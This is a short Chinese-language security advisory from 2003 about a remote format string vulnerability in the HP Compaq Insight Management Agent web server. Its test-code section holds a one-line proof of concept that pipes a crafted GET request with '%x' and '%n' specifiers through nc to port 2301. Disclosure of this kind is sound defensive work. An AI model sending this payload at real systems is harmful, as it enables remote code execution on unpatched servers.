HP Compaq Insight Management Agent远程格式串处理漏洞发布时间:2003-08-04 更新时间:2003-08-04 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:8336 受影响系统 Compaq Insight Management Agents 5.0 H详细描述 Compaq Management Agent HTTP server实现上存在一个格式串处理漏洞,远程攻击者可能利用此漏洞以Local System进程权限执行任意代码。 测试代码 $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301 解决方案 厂商还未提供解决方案。 相关信息 Insight Manager 7 SP2 http://h18013.www1.hp.com/products/servers/management/cim7-overview.html |
